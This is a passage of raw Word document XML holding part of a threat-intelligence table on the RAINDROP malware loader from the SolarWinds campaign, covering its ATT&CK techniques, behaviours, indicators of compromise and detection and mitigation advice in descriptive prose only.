                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Masquerading </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1140</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">/Decode Files or Information </w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>T1218</w:t>
            </w:r>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> – Signed Binary Proxy Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="750542A6" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AFAB95E" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Execution Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FA62C7C" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Executed through malicious DLLs and loaders that decrypted and injected payloads into legitimate processes. Frequently used to deploy Cobalt Strike beacons in-memory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="2CD14D05" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65DABD95" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Persistence Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13A7F0E5" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Limited persistence functionality documented; persistence generally established through follow-on attacker tooling or malicious services.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="443BACFD" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74848BC2" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BF2949B" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No direct privilege escalation capability publicly documented for RAINDROP itself; attackers leveraged previously compromised privileged accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="6FD3AF8C" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="406845F8" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B510FAF" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Uses obfuscated payloads, process injection, masquerading, encrypted shellcode, and memory-only execution to bypass antivirus and endpoint defenses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="1A5A8ADD" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27027B2E" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="253C6E27" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No direct credential theft capability documented within RAINDROP itself; secondary payloads such as Cobalt Strike may facilitate credential dumping and token theft.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="3BE434C3" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E8DF8B5" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Discovery Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="478B08FA" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Minimal native discovery functionality; used primarily as a staging loader for post-exploitation frameworks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="41B1145B" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CC903CB" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06A34C41" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Frequently deployed during lateral movement operations within victim environments after initial compromise. Supported remote deployment of additional payloads to internal systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="0EBBD8B9" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4166D07C" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Command &amp; Control (C2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2058EE54" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Delivered Cobalt Strike payloads that established encrypted command-and-control communications with attacker infrastructure.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="348FCE7A" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5775DA44" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F435139" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>No native exfiltration capability publicly documented; exfiltration operations handled by secondary malware or attacker-operated tooling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="77DCDB05" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BF0DED6" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Impact Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32A17A48" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Enabled stealthy post-compromise operations, supported expansion across enterprise networks, increased attacker persistence, and facilitated espionage activities during the SolarWinds campaign.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="5F8F3866" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6ECB37DD" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Indicators of Compromise (IOCs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="052B0C9B" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Suspicious DLL execution, process injection activity, memory-resident payloads, encrypted shellcode, anomalous network traffic associated with Cobalt Strike, and unusual child-process creation patterns.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="6521057B" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="147393B3" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Detection &amp; Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30F5EA0F" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>Use EDR memory analysis, monitor process injection behaviors, inspect suspicious DLL execution, detect anomalous Cobalt Strike traffic, apply least privilege, enable network segmentation, and monitor lateral movement activity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC4402" w:rsidRPr="003168F2" w14:paraId="6363690A" w14:textId="77777777" w:rsidTr="009B4494">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EDC3D30" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>References &amp; Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22243DCB" w14:textId="77777777" w:rsidR="00AC4402" w:rsidRPr="003168F2" w:rsidRDefault="00AC4402" w:rsidP="00AC4402">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:hyperlink r:id="rId38" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
                <w:t>MITRE ATT&amp;CK RAINDROP S0565</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2. </w:t>
            </w:r>
            <w:hyperlink r:id="rId39" w:history="1">
              <w:r w:rsidRPr="003168F2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="14"/>
                </w:rPr>
